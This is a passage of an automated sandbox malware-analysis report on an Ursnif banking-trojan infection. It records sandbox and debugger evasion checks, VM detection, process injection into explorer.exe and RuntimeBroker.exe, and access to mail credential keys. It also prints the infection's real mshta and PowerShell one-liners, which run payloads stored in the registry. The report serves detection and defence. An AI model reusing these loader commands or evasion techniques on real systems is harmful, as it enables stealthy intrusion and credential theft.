            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE@
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE@
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE(=
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE@
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE@.8
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: PEID.EXE@#Z
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE@
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXE@A
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE@B
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE@
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE@
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE@:V
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXE
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: C:\Windows\System32\control.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3636Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5256Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.dllJump to dropped file
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\earmark.avchdJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 3120Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\explorer.exeCode function: 32_2_04DA37B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,32_2_04DA37B8
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: wscript.exe, 00000000.00000002.687515024.0000014D600F0000.00000002.00000001.sdmp, explorer.exe, 00000020.00000002.1312946746.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.927198376.0000027D4F440000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 00000020.00000000.901398343.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: wscript.exe, 00000000.00000002.687515024.0000014D600F0000.00000002.00000001.sdmp, explorer.exe, 00000020.00000002.1312946746.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.927198376.0000027D4F440000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.687515024.0000014D600F0000.00000002.00000001.sdmp, explorer.exe, 00000020.00000002.1312946746.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.927198376.0000027D4F440000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.687515024.0000014D600F0000.00000002.00000001.sdmp, explorer.exe, 00000020.00000002.1312946746.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.927198376.0000027D4F440000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: earmark.avchd.0.drJump to dropped file
            Allocates memory in foreign processesShow sources
            Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC40000 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C300000 protect: page execute and read and write
            Changes memory attributes in foreign processes to executable or writableShow sources
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
            Compiles code for process injection (via .Net compiler)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.0.csJump to dropped file
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: BD4F1580Jump to behavior
            Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
            Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
            Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
            Injects code into the Windows Explorer (explorer.exe)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 9F6000 value: 00Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: EBJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 24C0000 value: 80Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: 40Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3424Jump to behavior
            Source: C:\Windows\explorer.exeThread register set: target process: 3656
            Source: C:\Windows\explorer.exeThread register set: target process: 4268
            Source: C:\Windows\explorer.exeThread register set: target process: 4772
            Source: C:\Windows\explorer.exeThread register set: target process: 5816
            Source: C:\Windows\explorer.exeThread register set: target process: 6340
            Writes to foreign memory regionsShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 9F6000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 24C0000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7386883000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC40000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD2179000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C300000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline'Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline'Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD10C.tmp' 'c:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE214.tmp' 'c:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP'
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: explorer.exe, 00000020.00000000.893126170.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000020.00000000.893860754.0000000001080000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000020.00000000.893860754.0000000001080000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000020.00000000.893860754.0000000001080000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000020.00000000.893860754.0000000001080000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: autoruns.exe
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000003.882736166.0000000001040000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719373287.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719415680.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.817982563.00000000052EF000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.718993009.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719443986.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.1294500412.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.1296954401.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719331728.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.1311153355.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719519037.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.923726669.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719248205.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.762861604.00000000053ED000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719501128.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719850328.00000000054EB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.1296813994.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5976, type: MEMORY
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000003.882736166.0000000001040000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719373287.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719415680.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.817982563.00000000052EF000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.718993009.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719443986.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.1294500412.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.1296954401.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719331728.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.1311153355.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719519037.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.923726669.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719248205.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.762861604.00000000053ED000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719501128.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719850328.00000000054EB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.1296813994.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5976, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
